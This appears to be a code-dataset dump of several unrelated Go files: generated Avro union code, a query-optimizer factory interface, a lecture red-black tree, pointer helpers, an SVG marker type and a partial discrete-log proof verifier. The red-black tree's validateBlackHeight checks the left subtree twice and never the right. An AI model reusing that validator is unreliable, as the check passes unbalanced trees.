panic("Unsupported operation")
}
func (r *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetLong(v int64) {
r.UnionType = (UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum)(v)
}
func (r *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) Get(i int) types.Field {
switch i {
case 0:
return r.Null
case 1:
r.Integer = NewInteger()
return r.Integer
case 2:
r.Character = NewCharacter()
return r.Character
case 3:
r.Decimal = NewDecimal()
return r.Decimal
case 4:
r.Float = NewFloat()
return r.Float
case 5:
r.Timestamp = NewTimestamp()
return r.Timestamp
case 6:
r.DateTime = NewDateTime()
return r.DateTime
case 7:
r.TimestampWithTimeZone = NewTimestampWithTimeZone()
return r.TimestampWithTimeZone
case 8:
r.BinaryGeometry = NewBinaryGeometry()
return r.BinaryGeometry
case 9:
r.TextGeometry = NewTextGeometry()
return r.TextGeometry
case 10:
r.BinaryObject = NewBinaryObject()
return r.BinaryObject
case 11:
r.TextObject = NewTextObject()
return r.TextObject
case 12:
return &EmptyObjectWrapper{Target: (&r.EmptyObject)}
}
panic("Unknown field index")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) NullField(i int) {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetDefault(i int) {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) AppendMap(key string) types.Field {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) AppendArray() types.Field {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) Finalize() {
}
func (r *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) MarshalJSON() ([]byte, error) {
if r == nil {
return []byte("null"), nil
}
switch r.UnionType {
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumInteger:
return json.Marshal(map[string]interface{}{"Integer": r.Integer})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumCharacter:
return json.Marshal(map[string]interface{}{"Character": r.Character})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDecimal:
return json.Marshal(map[string]interface{}{"Decimal": r.Decimal})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumFloat:
return json.Marshal(map[string]interface{}{"Float": r.Float})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestamp:
return json.Marshal(map[string]interface{}{"Timestamp": r.Timestamp})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDateTime:
return json.Marshal(map[string]interface{}{"DateTime": r.DateTime})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestampWithTimeZone:
return json.Marshal(map[string]interface{}{"TimestampWithTimeZone": r.TimestampWithTimeZone})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryGeometry:
return json.Marshal(map[string]interface{}{"BinaryGeometry": r.BinaryGeometry})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextGeometry:
return json.Marshal(map[string]interface{}{"TextGeometry": r.TextGeometry})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryObject:
return json.Marshal(map[string]interface{}{"BinaryObject": r.BinaryObject})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextObject:
return json.Marshal(map[string]interface{}{"TextObject": r.TextObject})
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumEmptyObject:
return json.Marshal(map[string]interface{}{"EmptyObject": r.EmptyObject})
}
return nil, fmt.Errorf("invalid value for *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject")
}
func (r *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) UnmarshalJSON(data []byte) error {
var fields map[string]json.RawMessage
if err := json.Unmarshal(data, &fields); err != nil {
return err
}
if value, ok := fields["Integer"]; ok {
r.UnionType = 1
return json.Unmarshal([]byte(value), &r.Integer)
}
if value, ok := fields["Character"]; ok {
r.UnionType = 2
return json.Unmarshal([]byte(value), &r.Character)
}
if value, ok := fields["Decimal"]; ok {
r.UnionType = 3
return json.Unmarshal([]byte(value), &r.Decimal)
}
if value, ok := fields["Float"]; ok {
r.UnionType = 4
return json.Unmarshal([]byte(value), &r.Float)
}
if value, ok := fields["Timestamp"]; ok {
r.UnionType = 5
return json.Unmarshal([]byte(value), &r.Timestamp)
}
if value, ok := fields["DateTime"]; ok {
r.UnionType = 6
return json.Unmarshal([]byte(value), &r.DateTime)
}
if value, ok := fields["TimestampWithTimeZone"]; ok {
r.UnionType = 7
return json.Unmarshal([]byte(value), &r.TimestampWithTimeZone)
}
if value, ok := fields["BinaryGeometry"]; ok {
r.UnionType = 8
return json.Unmarshal([]byte(value), &r.BinaryGeometry)
}
if value, ok := fields["TextGeometry"]; ok {
r.UnionType = 9
return json.Unmarshal([]byte(value), &r.TextGeometry)
}
if value, ok := fields["BinaryObject"]; ok {
r.UnionType = 10
return json.Unmarshal([]byte(value), &r.BinaryObject)
}
if value, ok := fields["TextObject"]; ok {
r.UnionType = 11
return json.Unmarshal([]byte(value), &r.TextObject)
}
if value, ok := fields["EmptyObject"]; ok {
r.UnionType = 12
return json.Unmarshal([]byte(value), &r.EmptyObject)
}
return fmt.Errorf("invalid value for *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject")
} | dtsavro/union_null_integer_character_decimal_float_timestamp_date_time_timestamp_with_time_zone_binary_geometry_text_geometry_binary_object_text_object_empty_object.go | 0.81119 | 0.41834 | union_null_integer_character_decimal_float_timestamp_date_time_timestamp_with_time_zone_binary_geometry_text_geometry_binary_object_text_object_empty_object.go | starcoder |
package opt
type Factory interface {
// Metadata returns the query-specific metadata, which includes information
// about the columns and tables used in this particular query.
Metadata() *Metadata
// StoreList allocates storage for a list of group IDs in the memo and
// returns an ID that can be used for later lookup.
StoreList(items []GroupID) ListID
// InternPrivate adds the given private value to the memo and returns an ID
// that can be used for later lookup. If the same value was added before,
// then this method is a no-op and returns the ID of the previous value.
InternPrivate(private interface{}) PrivateID
// DynamicConstruct dynamically constructs an operator with the given type
// and operands. It is equivalent to a switch statement that calls the
// ConstructXXX method that corresponds to the given operator.
DynamicConstruct(op Operator, children []GroupID, private PrivateID) GroupID
// Scalar operator constructors.
ConstructSubquery(input GroupID, projection GroupID) GroupID
ConstructVariable(col PrivateID) GroupID
ConstructConst(value PrivateID) GroupID
ConstructTrue() GroupID
ConstructFalse() GroupID
ConstructPlaceholder(value PrivateID) GroupID
ConstructTuple(elems ListID) GroupID
ConstructProjections(elems ListID, cols PrivateID) GroupID
ConstructFilters(conditions ListID) GroupID
ConstructExists(input GroupID) GroupID
ConstructAnd(left GroupID, right GroupID) GroupID
ConstructOr(left GroupID, right GroupID) GroupID
ConstructNot(input GroupID) GroupID
ConstructEq(left GroupID, right GroupID) GroupID
ConstructLt(left GroupID, right GroupID) GroupID
ConstructGt(left GroupID, right GroupID) GroupID
ConstructLe(left GroupID, right GroupID) GroupID
ConstructGe(left GroupID, right GroupID) GroupID
ConstructNe(left GroupID, right GroupID) GroupID
ConstructIn(left GroupID, right GroupID) GroupID
ConstructNotIn(left GroupID, right GroupID) GroupID
ConstructLike(left GroupID, right GroupID) GroupID
ConstructNotLike(left GroupID, right GroupID) GroupID
ConstructILike(left GroupID, right GroupID) GroupID
ConstructNotILike(left GroupID, right GroupID) GroupID
ConstructSimilarTo(left GroupID, right GroupID) GroupID
ConstructNotSimilarTo(left GroupID, right GroupID) GroupID
ConstructRegMatch(left GroupID, right GroupID) GroupID
ConstructNotRegMatch(left GroupID, right GroupID) GroupID
ConstructRegIMatch(left GroupID, right GroupID) GroupID
ConstructNotRegIMatch(left GroupID, right GroupID) GroupID
ConstructIs(left GroupID, right GroupID) GroupID
ConstructIsNot(left GroupID, right GroupID) GroupID
ConstructContains(left GroupID, right GroupID) GroupID
ConstructContainedBy(left GroupID, right GroupID) GroupID
ConstructAny(left GroupID, right GroupID) GroupID
ConstructSome(left GroupID, right GroupID) GroupID
ConstructAll(left GroupID, right GroupID) GroupID
ConstructBitand(left GroupID, right GroupID) GroupID
ConstructBitor(left GroupID, right GroupID) GroupID
ConstructBitxor(left GroupID, right GroupID) GroupID
ConstructPlus(left GroupID, right GroupID) GroupID
ConstructMinus(left GroupID, right GroupID) GroupID
ConstructMult(left GroupID, right GroupID) GroupID
ConstructDiv(left GroupID, right GroupID) GroupID
ConstructFloorDiv(left GroupID, right GroupID) GroupID
ConstructMod(left GroupID, right GroupID) GroupID
ConstructPow(left GroupID, right GroupID) GroupID
ConstructConcat(left GroupID, right GroupID) GroupID
ConstructLShift(left GroupID, right GroupID) GroupID
ConstructRShift(left GroupID, right GroupID) GroupID
ConstructFetchVal(json GroupID, index GroupID) GroupID
ConstructFetchText(json GroupID, index GroupID) GroupID
ConstructFetchValPath(json GroupID, path GroupID) GroupID
ConstructFetchTextPath(json GroupID, path GroupID) GroupID
ConstructUnaryPlus(input GroupID) GroupID
ConstructUnaryMinus(input GroupID) GroupID
ConstructUnaryComplement(input GroupID) GroupID
ConstructFunction(args ListID, def PrivateID) GroupID
// Relational operator constructors.
ConstructScan(table PrivateID) GroupID
ConstructValues(rows ListID, cols PrivateID) GroupID
ConstructSelect(input GroupID, filter GroupID) GroupID
ConstructProject(input GroupID, projections GroupID) GroupID
ConstructInnerJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructLeftJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructRightJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructFullJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructSemiJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructAntiJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructInnerJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructLeftJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructRightJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructFullJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructSemiJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructAntiJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructGroupBy(input GroupID, groupings GroupID, aggregations GroupID) GroupID
ConstructUnion(left GroupID, right GroupID, colMap PrivateID) GroupID
ConstructIntersect(left GroupID, right GroupID) GroupID
ConstructExcept(left GroupID, right GroupID) GroupID
} | pkg/sql/opt/opt/factory.og.go | 0.647575 | 0.447762 | factory.og.go | starcoder |
package rbt
import "fmt"
type KeyType int64
const (
maxKey = KeyType(0x7fffffffffffffff)
minKey = -maxKey - 1
)
const (
Red = 0
Black = 1
)
type Node struct {
Key KeyType
Parent, Left, Right *Node
Color uint8
}
type Tree struct {
Root, Nil *Node
nilN Node
}
func New() *Tree {
var t Tree
t.nilN.Color = Black
t.Nil = &t.nilN
t.Root = t.Nil
return &t
}
func (t *Tree) makeNode(k KeyType) *Node {
return &Node{Key: k, Parent: t.Nil, Left: t.Nil, Right: t.Nil, Color: Red}
}
func (t *Tree) Insert(k KeyType) {
y := t.Nil
x := t.Root
for x != t.Nil {
y = x
if k <= x.Key {
x = x.Left
} else {
x = x.Right
}
}
z := t.makeNode(k)
z.Parent = y
if y == t.Nil {
t.Root = z
} else if k <= y.Key {
y.Left = z
} else {
y.Right = z
}
t.insertFixup(z)
}
func (t *Tree) insertFixup(z *Node) {
for z.Parent.Color == Red {
y := z.Parent.Parent
if z.Parent == y.Left {
if y.Right.Color == Red {
// Case 1: recolor
y.Color = Red
y.Left.Color = Black
y.Right.Color = Black
z = y
} else { // y.Right.Color == Black
if z == z.Parent.Right {
// Case 2: straighten
z = z.Parent
t.leftRotate(z)
}
// Case 3: rotate/balance
z.Parent.Color = Black
y.Color = Red
t.rightRotate(y)
}
} else { // z.Parent == y.Right
if y.Left.Color == Red {
// Case 1: recolor
y.Color = Red
y.Left.Color = Black
y.Right.Color = Black
z = y
} else { // y.Left.Color == Black
if z == z.Parent.Left {
// Case 2: straighten
z = z.Parent
t.rightRotate(z)
}
// Case 3: rotate/balance
z.Parent.Color = Black
y.Color = Red
t.leftRotate(y)
}
}
}
t.Root.Color = Black
}
func (t *Tree) Delete(k KeyType) {
z := t.Root
for z != t.Nil && z.Key != k {
if k < z.Key {
z = z.Left
} else {
z = z.Right
}
}
var x *Node
color := z.Color
switch {
case z == t.Nil:
return // Key not found.
case z.Left == t.Nil:
// Node to delete has at most a right child.
x = z.Right
t.transplant(z, x)
case z.Right == t.Nil:
// Node to delete has only a left child
x = z.Left
t.transplant(z, x)
default:
// Node to delete has two children
y := t.min(z.Right)
color = y.Color
x = y.Right
if y.Parent == z {
x.Parent = y
} else {
t.transplant(y, y.Right)
y.Right = z.Right
y.Right.Parent = y
}
t.transplant(z, y)
y.Left = z.Left
y.Left.Parent = y
y.Color = z.Color
}
if color == Black {
t.deleteFixup(x)
}
}
func (t *Tree) deleteFixup(x *Node) {
for x != t.Root && x.Color == Black {
if x == x.Parent.Left {
w := x.Parent.Right
if w.Color == Red {
// Case 1: make the sibling black
t.leftRotate(x.Parent)
w.Color = Black
x.Parent.Color = Red
w = x.Parent.Right
}
if w.Left.Color == Black && w.Right.Color == Black {
// Case 2: push the double blackness up
w.Color = Red
x = x.Parent
} else {
// Case 3:
if w.Left.Color == Red && w.Right.Color == Black {
w.Color = Red
w.Left.Color = Black
t.rightRotate(w)
w = x.Parent.Right
}
// Case 4: remove the double blackness; end
w.Color = x.Parent.Color
w.Right.Color = Black
x.Parent.Color = Black
t.leftRotate(x.Parent)
x = t.Root
}
} else { // x == x.Parent.Right
w := x.Parent.Left
if w.Color == Red {
// Case 1: make the sibling black
t.rightRotate(x.Parent)
w.Color = Black
x.Parent.Color = Red
w = x.Parent.Left
}
if w.Left.Color == Black && w.Right.Color == Black {
// Case 2: push the double blackness up
w.Color = Red
x = x.Parent
} else {
// Case 3:
if w.Left.Color == Black && w.Right.Color == Red {
w.Color = Red
w.Right.Color = Black
t.leftRotate(w)
w = x.Parent.Left
}
// Case 4: remove the double blackness; end
w.Color = x.Parent.Color
w.Left.Color = Black
x.Parent.Color = Black
t.rightRotate(x.Parent)
x = t.Root
}
}
}
x.Color = Black
}
func (t *Tree) leftRotate(x *Node) {
y := x.Right
y.Parent = x.Parent
if x == t.Root {
t.Root = y
} else {
if x == x.Parent.Left {
x.Parent.Left = y
} else {
x.Parent.Right = y
}
}
x.Right = y.Left
if y.Left != t.Nil {
y.Left.Parent = x
}
y.Left = x
x.Parent = y
}
func (t *Tree) rightRotate(y *Node) {
x := y.Left
x.Parent = y.Parent
if y == t.Root {
t.Root = x
} else {
if y == y.Parent.Left {
y.Parent.Left = x
} else {
y.Parent.Right = x
}
}
y.Left = x.Right
if x.Right != t.Nil {
x.Right.Parent = y
}
x.Right = y
y.Parent = x
}
func (t *Tree) transplant(u, v *Node) {
if u.Parent == t.Nil {
t.Root = v
} else if u == u.Parent.Left {
u.Parent.Left = v
} else {
u.Parent.Right = v
}
v.Parent = u.Parent
}
func (t *Tree) min(u *Node) *Node {
for u.Left != t.Nil {
u = u.Left
}
return u
}
func (t *Tree) WriteDot() string {
var sn, se string
_, sn = t.writeDotNodes(1, t.Root)
_, se = t.writeDotEdges(1, t.Root)
return "digraph RBTree {\n" + sn + se + "}\n"
}
const leafString = "[shape=point]"
func (t *Tree) writeDotNodes(n uint, nd *Node) (uint, string) {
if nd == t.Nil {
return n + 1, fmt.Sprintf("n%d%s\n", n, leafString)
}
var color string
if nd.Color == Red {
color = "red"
} else {
color = "black"
}
var s, sl, sr string
s = fmt.Sprintf("n%d[label=\"%d\", color=%s]\n", n, int64(nd.Key), color)
n, sl = t.writeDotNodes(n + 1, nd.Left)
n, sr = t.writeDotNodes(n, nd.Right)
return n, s + sl + sr
}
func (t *Tree) writeDotEdges(n uint, nd *Node) (uint, string) {
if nd == t.Nil {
return n + 1, ""
}
nl, sl := t.writeDotEdges(n + 1, nd.Left)
nr, sr := t.writeDotEdges(nl, nd.Right)
s := fmt.Sprintf("n%d -> n%d[arrowhead=none]\n", n, n + 1)
s += fmt.Sprintf("n%d -> n%d[arrowhead=none]\n", n, nl)
return nr, s + sl + sr
}
func (t *Tree) validateTreeConnectivity() bool {
return t.validateConnectivity(t.Root)
}
func (t *Tree) validateConnectivity(nd *Node) bool {
if nd == t.Nil {
return true
}
if nd == nil {
return false
}
if !t.validateConnectivity(nd.Left) || !t.validateConnectivity(nd.Right) {
return false
}
if nd.Left != t.Nil && nd.Left.Parent != nd {
return false
}
if nd.Right != t.Nil && nd.Right.Parent != nd {
return false
}
return true
}
func (t *Tree) validateTreeBlackHeight() bool {
_, e := t.validateBlackHeight(t.Root)
return e
}
func (t *Tree) validateBlackHeight(x *Node) (uint, bool) {
if x == t.Nil {
return 0, true
}
h1, e1 := t.validateBlackHeight(x.Left)
h2, e2 := t.validateBlackHeight(x.Left)
if !e1 || !e2 {
return 0, false
}
if h1 != h2 {
return 0, false
}
return h1 + uint(x.Color), true
}
func (t *Tree) validateTreeRedChildren() bool {
return t.validateRedChildren(t.Root)
}
func (t *Tree) validateRedChildren(x *Node) bool {
if x == t.Nil {
return true
}
if x.Color == Red && (x.Left.Color != Black || x.Right.Color != Black) {
return false
}
return t.validateRedChildren(x.Left) && t.validateRedChildren(x.Right)
}
func (t *Tree) verifyTreeBSTProperty() bool {
return t.verifyBSTProperty(t.Root, minKey, maxKey)
}
func (t *Tree) verifyBSTProperty(p *Node, low, high KeyType) bool {
if p == t.Nil {
return true
}
if p.Key < low || p.Key > high {
return false
}
return t.verifyBSTProperty(p.Left, low, p.Key) &&
t.verifyBSTProperty(p.Right, p.Key + 1, high)
} | Lecture 10- Red-black trees/src/rbt/rbt.go | 0.745769 | 0.550366 | rbt.go | starcoder |
package ext
import (
"reflect"
"time"
)
func IsNil(value interface{}) bool {
if value == nil {
return true
}
v := reflect.ValueOf(value)
return v.Kind() == reflect.Ptr && v.IsNil()
}
func IsEmpty(test *string) bool {
if test == nil {
return true
}
return *test == ""
}
// Pointers
func Bool(val bool) *bool {
return &val
}
func String(val string) *string {
return &val
}
func Byte(val byte) *byte {
return &val
}
func Int(val int) *int {
return &val
}
func Int8(val int8) *int8 {
return &val
}
func Int16(val int16) *int16 {
return &val
}
func Int32(val int32) *int32 {
return &val
}
func Int64(val int64) *int64 {
return &val
}
func Float32(val float32) *float32 {
return &val
}
func Float64(val float64) *float64 {
return &val
}
// Defaults
func DefBool(test *bool, value bool) bool {
if test == nil {
return value
} else {
return *test
}
}
func DefStr(test *string, value string) string {
if test == nil {
return value
} else {
return *test
}
}
func DefInt64(test *int64, value int64) int64 {
if test == nil {
return value
} else {
return *test
}
}
func DefFloat64(test *float64, value float64) float64 {
if test == nil {
return value
} else {
return *test
}
}
func DefTime(test *time.Time, value time.Time) time.Time {
if test == nil {
return value
} else {
return *test
}
}
func DefDate(test *Date, value Date) Date {
if test == nil {
return value
} else {
return *test
}
}
// Clone
func CloneBool(test *bool) *bool {
if test == nil {
return nil
} else {
return Bool(*test)
}
}
func CloneStr(test *string) *string {
if test == nil {
return nil
} else {
return String(*test)
}
}
func CloneInt64(test *int64) *int64 {
if test == nil {
return nil
} else {
return Int64(*test)
}
}
func CloneFloat64(test *float64) *float64 {
if test == nil {
return nil
} else {
return Float64(*test)
}
}
func CloneTime(test *time.Time) *time.Time {
if test == nil {
return nil
} else {
v := *test
return &v
}
}
func CloneDate(test *Date) *Date {
if test == nil {
return nil
} else {
v := *test
return &v
}
} | ext/Tools.go | 0.602763 | 0.42054 | Tools.go | starcoder |
package svg
import (
"github.com/goki/gi/gi"
"github.com/goki/gi/gist"
"github.com/goki/ki/ki"
"github.com/goki/ki/kit"
"github.com/goki/mat32"
)
// Marker represents marker elements that can be drawn along paths (arrow heads, etc)
type Marker struct {
NodeBase
RefPos mat32.Vec2 `xml:"{refX,refY}" desc:"reference position to align the vertex position with, specified in ViewBox coordinates"`
Size mat32.Vec2 `xml:"{markerWidth,markerHeight}" desc:"size of marker to render, in Units units"`
Units MarkerUnits `xml:"markerUnits" desc:"units to use"`
ViewBox ViewBox `desc:"viewbox defines the internal coordinate system for the drawing elements within the marker"`
Orient string `xml:"orient" desc:"orientation of the marker -- either 'auto' or an angle"`
VertexPos mat32.Vec2 `desc:"current vertex position"`
VertexAngle float32 `desc:"current vertex angle in radians"`
StrokeWidth float32 `desc:"current stroke width"`
XForm mat32.Mat2 `desc:"net transform computed from settings and current values -- applied prior to rendering"`
EffSize mat32.Vec2 `desc:"effective size for actual rendering"`
}
var KiT_Marker = kit.Types.AddType(&Marker{}, ki.Props{"EnumType:Flag": gi.KiT_NodeFlags})
// AddNewMarker adds a new marker to given parent node, with given name.
func AddNewMarker(parent ki.Ki, name string) *Marker {
return parent.AddNewChild(KiT_Marker, name).(*Marker)
}
func (g *Marker) SVGName() string { return "marker" }
func (g *Marker) EnforceSVGName() bool { return false }
func (g *Marker) CopyFieldsFrom(frm interface{}) {
fr := frm.(*Marker)
g.NodeBase.CopyFieldsFrom(&fr.NodeBase)
g.RefPos = fr.RefPos
g.Size = fr.Size
g.Units = fr.Units
g.ViewBox = fr.ViewBox
g.Orient = fr.Orient
g.VertexPos = fr.VertexPos
g.VertexAngle = fr.VertexAngle
g.StrokeWidth = fr.StrokeWidth
g.XForm = fr.XForm
g.EffSize = fr.EffSize
}
// MarkerUnits specifies units to use for svg marker elements
type MarkerUnits int32
const (
StrokeWidth MarkerUnits = iota
UserSpaceOnUse
MarkerUnitsN
)
//go:generate stringer -type=MarkerUnits
var KiT_MarkerUnits = kit.Enums.AddEnumAltLower(MarkerUnitsN, kit.NotBitFlag, gist.StylePropProps, "")
func (ev MarkerUnits) MarshalJSON() ([]byte, error) { return kit.EnumMarshalJSON(ev) }
func (ev *MarkerUnits) UnmarshalJSON(b []byte) error { return kit.EnumUnmarshalJSON(ev, b) }
// RenderMarker renders the marker using given vertex position, angle (in
// radians), and stroke width
func (mrk *Marker) RenderMarker(vertexPos mat32.Vec2, vertexAng, strokeWidth float32) {
mrk.VertexPos = vertexPos
mrk.VertexAngle = vertexAng
mrk.StrokeWidth = strokeWidth
if mrk.Units == StrokeWidth {
mrk.EffSize = mrk.Size.MulScalar(strokeWidth)
} else {
mrk.EffSize = mrk.Size
}
ang := vertexAng
if mrk.Orient != "auto" {
ang, _ = mat32.ParseAngle32(mrk.Orient)
}
if mrk.ViewBox.Size.IsNil() {
mrk.ViewBox.Size = mat32.Vec2{3, 3}
}
mrk.XForm = mat32.Rotate2D(ang).Scale(mrk.EffSize.X/mrk.ViewBox.Size.X, mrk.EffSize.Y/mrk.ViewBox.Size.Y).Translate(-mrk.RefPos.X, -mrk.RefPos.Y)
mrk.XForm.X0 += vertexPos.X
mrk.XForm.Y0 += vertexPos.Y
mrk.Pnt.XForm = mrk.XForm
mrk.Render2D()
}
func (g *Marker) Render2D() {
if g.Viewport == nil {
g.This().(gi.Node2D).Init2D()
}
pc := &g.Pnt
rs := g.Render()
if rs == nil {
return
}
rs.PushXFormLock(pc.XForm)
g.Render2DChildren()
g.ComputeBBoxSVG() // must come after render
rs.PopXFormLock()
} | svg/marker.go | 0.764364 | 0.429968 | marker.go | starcoder |
package dlogproofs
import (
"math/big"
"github.com/xlab-si/emmy/crypto/common"
"github.com/xlab-si/emmy/crypto/groups"
)
type Transcript struct {
A *big.Int
B *big.Int
Hash *big.Int
ZAlpha *big.Int
}
func NewTranscript(a, b, hash, zAlpha *big.Int) *Transcript {
return &Transcript{
A: a,
B: b,
Hash: hash,
ZAlpha: zAlpha,
}
}
// Verifies that the blinded transcript is valid. That means the knowledge of log_g1(t1), log_G2(T2)
// and log_g1(t1) = log_G2(T2). Note that G2 = g2^gamma, T2 = t2^gamma where gamma was chosen
// by verifier.
func VerifyBlindedTranscript(transcript *Transcript, group *groups.SchnorrGroup, g1, t1, G2, T2 *big.Int) bool {
// Transcript should be in the following form: [alpha1, beta1, hash(alpha1, beta1), z+alpha]
// check hash:
hashNum := common.Hash(transcript.A, transcript.B)
if hashNum.Cmp(transcript.Hash) != 0 {
return false
}
// We need to verify (note that c-beta = hash(alpha1, beta1))
// g1^(z+alpha) = alpha1 * t1^(c-beta)
// G2^(z+alpha) = beta1 * T2^(c-beta)
left1 := group.Exp(g1, transcript.ZAlpha)
right1 := group.Exp(t1, transcript.Hash)
right1 = group.Mul(transcript.A, right1)
left2 := group.Exp(G2, transcript.ZAlpha)
right2 := group.Exp(T2, transcript.Hash)
right2 = group.Mul(transcript.B, right2)
if left1.Cmp(right1) == 0 && left2.Cmp(right2) == 0 {
return true
} else {
return false
}
}
type DLogEqualityBTranscriptProver struct {
Group *groups.SchnorrGroup
r *big.Int
secret *big.Int
g1 *big.Int
g2 *big.Int
}
func NewDLogEqualityBTranscriptProver(group *groups.SchnorrGroup) *DLogEqualityBTranscriptProver {
prover := DLogEqualityBTranscriptProver{
Group: group,
}
return &prover
}
// Prove that you know dlog_g1(h1), dlog_g2(h2) and that dlog_g1(h1) = dlog_g2(h2).
func (prover *DLogEqualityBTranscriptProver) GetProofRandomData(secret, g1, g2 *big.Int) (*big.Int,
*big.Int) {
// Set the values that are needed before the protocol can be run.
// The protocol proves the knowledge of log_g1(t1), log_g2(t2) and
// that log_g1(t1) = log_g2(t2).
prover.secret = secret
prover.g1 = g1
prover.g2 = g2
r := common.GetRandomInt(prover.Group.Q)
prover.r = r
x1 := prover.Group.Exp(prover.g1, r)
x2 := prover.Group.Exp(prover.g2, r)
return x1, x2
}
func (prover *DLogEqualityBTranscriptProver) GetProofData(challenge *big.Int) *big.Int {
// z = r + challenge * secret
z := new(big.Int)
z.Mul(challenge, prover.secret)
z.Add(z, prover.r)
z.Mod(z, prover.Group.Q)
return z
}
type DLogEqualityBTranscriptVerifier struct {
Group *groups.SchnorrGroup
gamma *big.Int
challenge *big.Int
g1 *big.Int
g2 *big.Int
x1 *big.Int
x2 *big.Int
t1 *big.Int
t2 *big.Int
alpha *big.Int
transcript *Transcript
}
func NewDLogEqualityBTranscriptVerifier(group *groups.SchnorrGroup,
gamma *big.Int) *DLogEqualityBTranscriptVerifier {
if gamma == nil {
gamma = common.GetRandomInt(group.Q)
}
verifier := DLogEqualityBTranscriptVerifier{
Group: group,
gamma: gamma,
}
return &verifier
}
func (verifier *DLogEqualityBTranscriptVerifier) GetChallenge(g1, g2, t1, t2, x1, x2 *big.Int) *big.Int {
// Set the values that are needed before the protocol can be run.
// The protocol proves the knowledge of log_g1(t1), log_g2(t2) and
// that log_g1(t1) = log_g2(t2).
verifier.g1 = g1
verifier.g2 = g2
verifier.t1 = t1
verifier.t2 = t2
// Set the values g1^r1 and g2^r2.
verifier.x1 = x1
verifier.x2 = x2
alpha := common.GetRandomInt(verifier.Group.Q)
beta := common.GetRandomInt(verifier.Group.Q)
// alpha1 = g1^r * g1^alpha * t1^beta
// beta1 = (g2^r * g2^alpha * t2^beta)^gamma
alpha1 := verifier.Group.Exp(verifier.g1, alpha)
alpha1 = verifier.Group.Mul(verifier.x1, alpha1)
tmp := verifier.Group.Exp(verifier.t1, beta)
alpha1 = verifier.Group.Mul(alpha1, tmp)
beta1 := verifier.Group.Exp(verifier.g2, alpha)
beta1 = verifier.Group.Mul(verifier.x2, beta1)
tmp = verifier.Group.Exp(verifier.t2, beta)
beta1 = verifier.Group.Mul(beta1, tmp)
beta1 = verifier.Group.Exp(beta1, verifier.gamma)
// c = hash(alpha1, beta) + beta mod q
